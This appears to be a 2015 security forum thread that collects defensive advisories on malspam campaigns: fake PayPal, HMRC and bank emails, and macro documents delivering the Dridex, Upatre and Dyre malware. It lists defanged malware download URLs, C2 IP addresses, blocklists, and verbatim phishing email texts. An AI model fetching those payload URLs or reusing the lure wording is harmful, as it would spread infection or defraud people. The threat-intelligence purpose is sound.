The ad silently loaded a Google shortened URL used to -redirect- to the exploit kit... This latest malvertising case illustrates the efficacy of leveraging ad networks to selectively infect end users while also demonstrating that there is a clear problem with identifying rogue advertisers. As stated by Fox-IT, the company responsible for the malvertising was not 'loaded via advertisements until Thursday last week, the first day we’ve seen this malvertising campaign in action'. This leaves some serious questions about the additional scrutiny in place for new advertisers and how it made it through security checks."

107.181.187.81: https://www.virustotal.com/en-gb/ip-...1/information/

[AplusWebMaster]

FYI...

Fake 'PayPal Receipt' SPAM - PDF malware
- http://myonlinesecurity.co.uk/paypal...e-pdf-malware/
17 June 2015 - "'Receipt for Your Payment to OMER SALIM' pretending to come from service@ intl .paypal .com with a zip attachment is another one from the current bot runs...

Screenshot: http://myonlinesecurity.co.uk/wp-con...OMER-SALIM.png

17 June 2015: Receipt99704.zip: Extracts to: Receipt99704.PDF.exe
Current Virus total detections: 10/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/fil...is/1434488522/
___

Fake 'Refunds for overpaid taxes' – Phish ...
- http://myonlinesecurity.co.uk/hmrc-r...axes-phishing/
17 June 2015 - "'Refunds for overpaid property taxes' pretending to come from HM Revenue & Customs <ecustomer.support@ hmrc .gateway .gov.uk> is an email pretending to come from HM Revenue & Customs... This one wants your personal details and your bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details... This particular email has a zip attachment that when unzipped has html webpage that asks you to fill in bank details. If you open the html attachment you see a webpage looking like this where they want your bank details, name and birth date:

Phish Screenshot: http://myonlinesecurity.co.uk/wp-con...erty-taxes.png

All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Or whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details..."
___

Fake 'Document Service' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/docume...sheet-malware/
17 June 2015 - "'Document Service, Order Id: 14262781 pretending to come from ICC <orders@ icc .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...

Screenshot: http://myonlinesecurity.co.uk/wp-con...e-Order-Id.png

17 June 2015: 14262781_FMM_751061928.doc - Current Virus total detections:4/57*
The malicious macro in this particular word doc downloads Dridex banking malware from http ://cheshiregunroom .com/23/07.exe. There are normally between 5 and 10 other download sites, all giving the same Dridex banking malware (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/fil...is/1434529913/

** https://www.virustotal.com/en-gb/fil...is/1434531876/
... Behavioural information
TCP connections
37.143.11.165: https://www.virustotal.com/en-gb/ip-...5/information/
88.221.14.249: https://www.virustotal.com/en-gb/ip-...9/information/

cheshiregunroom .com: 92.63.140.197: https://www.virustotal.com/en-gb/ip-...7/information/
___

Fake 'Message from KMBT' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/messag...sheet-malware/
17 Jun 2015 - "Message from KMBT_C280' pretending to come from scanner@ your own email domain with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email comes in with a completely -empty- body and just the subject line of Message from KMBT_C280.

17 June 2015 : SKMBT_C28015061614410.doc - Current Virus total detections: 4/57*
This particular malicious macro downloads Dridex banking malware from http ://businesssupportsoutheastlondon .co.uk/23/07.exe which is the -same- as described in today’s other malspam word doc campaign Document Service, Order Id: 14262781** - LE BISTROT PIERRE LIMITED – ICC – word doc or excel xls spreadsheet malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/fil...is/1434531806/

** http://myonlinesecurity.co.uk/docume...sheet-malware/

businesssupportsoutheastlondon .co.uk: 88.208.248.144: https://www.virustotal.com/en-gb/ip-...4/information/
___

Botnet-based malicious SPAM seen this week
- https://isc.sans.edu/diary.html?storyid=19807
2015-06-17 - "Botnets continually send out malicious spam (malspam). As mentioned in previous diaries, we see botnet-based malspam delivering Dridex and Dyre malware almost every day [1, 2]. Recently, someone sent us a malicious Word document from what appeared to be Dridex malspam on Tuesday 2015-06-16... Unfortunately, while investigating the malware, I could not generate the full range of infection traffic. Otherwise, the traffic follows the same general patterns we've previously seen with Dridex [1]... Dridex has been using Microsoft Word documents and Excel spreadsheets designed to infect a computer if macros are enabled, which matches the infection vector used by this malspam... Macros are -not- enabled in the default installation for Microsoft Office. To infect a computer, most people will have to -enable- macros after the document is opened, as shown below:
> https://isc.sans.edu/diaryimages/ima...y-image-04.jpg
...
> https://isc.sans.edu/diaryimages/ima...y-image-05.jpg ..."

1] https://isc.sans.edu/diary/Recent+Dridex+activity/19687

2] https://isc.sans.edu/diary/UpatreDyr...+malspam/19657

[AplusWebMaster]

FYI...

Fake email “Bank query alert” contains trojan
- http://blog.mxlab.eu/2015/06/18/fake...ntains-trojan/
June 18, 2015 - "... intercepted a new trojan distribution campaign by email with the subject “Bank query alert”. This email is sent from spoofed email addresses and has the following body:
Good day!
Please note that we have received the bank query from Your bank regarding the current account.
You are asked to fill the appropriate bank form, which is enclosed below, until 20th day of
June in order to avoid the security hold of the account. Please also confirm the following
account No.: 9042 5736 6695 0412. After filling the document please send us the scan-copy
so that we could duly forward it to the bank manager. If you have any questions feel
free to contact us on: 677-77-90.
Thanks in advance.
Best regards, Michael Forester Managing Partner

The attached file Michael.zip contains the 46 kB large file Transfer_blocked.exe. The trojan is known as Trojan.Win32.Generic.pak!cobra, Gen:Variant.Graftor.198120, Trojan.Win32.YY.Gen.4, LooksLike.Win32.Upatre.g (v) or Downloader.Upatre!gen9. At the time of writing, 7 of the 57 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/a...11da/analysis/
... Behavioural information
TCP connections
64.182.208.183: https://www.virustotal.com/en/ip-add...3/information/
93.93.194.202: https://www.virustotal.com/en/ip-add...2/information/
173.248.29.43: https://www.virustotal.com/en/ip-add...3/information/
88.221.15.80: https://www.virustotal.com/en/ip-add...0/information/
___

Fake 'CVD Insurance' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/cvd-in...sheet-malware/
18 Jun 2015 - "'CVD Insurance – documents attached' pretending to come from Lowri Duffield <lowri.duffield@ brightsidegroup .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...

Screenshot: http://myonlinesecurity.co.uk/wp-con...s-attached.png

18 June2015: 3098_001.doc - Current Virus total detections: 4/57*
... downloads Dridex banking malware from http ://evolutionfoundationcollege .co.uk/66/71.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5...is/1434619773/

** https://www.virustotal.com/en/file/1...is/1434619280/

evolutionfoundationcollege .co.uk: 188.121.55.128: https://www.virustotal.com/en/ip-add...8/information/
___

Fake 'Transfer to your account blocked' SPAM – PDF malware
- http://myonlinesecurity.co.uk/transf...e-pdf-malware/
18 Jun 2015 - "'Transfer to your account blocked' coming from random names at random email addresses with a zip attachment is another one from the current bot runs... The email which has random ID numbers that -match- the attachment name looks like:

Transfer has been blocked, details in an attachment.
ID Transfer: 96907740967
Date of formation: Thu, 18 Jun 2015 13:35:45 +0100

18 June 2015: id96907740967_Transfer_details.zip: Extracts to: Transfer_blocked.exe
Current Virus total detections: 3/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f...is/1434629016/
___

Fake 'banking invoice' SPAM - leads to malware
- http://blog.dynamoo.com/2015/06/malw...onica-cod.html
18 Jun 2015 - "These Portuguese-language spam pretends to be some sort of banking invoice aim, but instead leads to malware hosted on Google Drive. The target appears to be users in Brazil.

From: sac.contact4e74974737@ bol .com.br
To: mariomarinho@ uol .com.br
Date: 18 June 2015 at 08:46
Subject: NOTA FISCAL ELETRÔNICA COD. 6Uhrae.088693
Signed by: bol .com.br ...

The reference numbers and sender change slightly in each version. I've seen three samples before, each one with a different download location... which leads to a ZIP file named NFe_0185189710250029301785.zip which in turn contains a malicious executable NFe_0185189710250029301785.exe which has a VirusTotal detection rate of 8/57*. Comments in that report indicate that this may be the Spy.Banker trojan. The Malwr report indicates that it downloads components from the following locations:
http ://donwup2015 .com.br/arq/point.php
http ://tynly2015 .com.br/upt/ext.zlib
... These sites are hosted on:
108.167.188.249 (WebsiteWelcome, US)
187.17.111.104 (Universo Online, Brazil)
The VirusTotal report for both these IPs [1] [2] indicates a high level of badness, indicating that they should be -blocked-. Furthermore, Malwr shows that it drops a file with a detection rate of 2/57**...
Recommended blocklist:
108.167.188.249
187.17.111.104 ..."
* https://www.virustotal.com/en/file/2...is/1434618710/
... Behavioural information
TCP connections
1] 108.167.188.249: https://www.virustotal.com/en/ip-add...9/information/

2] 187.17.111.104: https://www.virustotal.com/en/ip-add...4/information/

** https://www.virustotal.com/en/file/e...is/1434619879/

[AplusWebMaster]

FYI...

Fake 'New instructions' SPAM - malicious payload
- http://blog.dynamoo.com/2015/06/malw...tructions.html
19 June 2015 - "This rather terse spam comes with a malicious payload:
From: tim [tim@ thramb .com]
Date: 19 June 2015 at 16:40
Subject: New instructions
New instructions payment of US banks, ask to read

Attached is an archive file with the somewhat unusual name of instructions.zip size=19811 which contains a malicious executable named instructions_document.exe. The VirusTotal analysis indicates that this is the Upatre download [detection rate 3/57*]. Automated analysis tools... show traffic to: 93.93.194.202 :13222/C21/UEQUILABOOMBOOM/0/51-SP3/0/MEBEFEBLGBEID ... which is an IP operated by Orion Telekom in Serbia, and also 66.196.63.33 :443 which is Hamilton Telecommunications in the US. A characteristic of this generation of Upatre is that it sends traffic to icanhazip.com which while not malicious in itself is quite a good indicator of infection. In all cases I have seen, Upatre drops the Dyre banking trojan, but I have been unable to obtain a sample.
Recommended blocklist:
93.93.194.202
66.196.63.33 "
* https://www.virustotal.com/en/file/6...is/1434725207/
... Behavioural information
TCP connections
104.238.141.75: https://www.virustotal.com/en/ip-add...5/information/
93.93.194.202: https://www.virustotal.com/en/ip-add...2/information/
66.196.63.33: https://www.virustotal.com/en/ip-add...3/information/
88.221.14.249: https://www.virustotal.com/en/ip-add...9/information/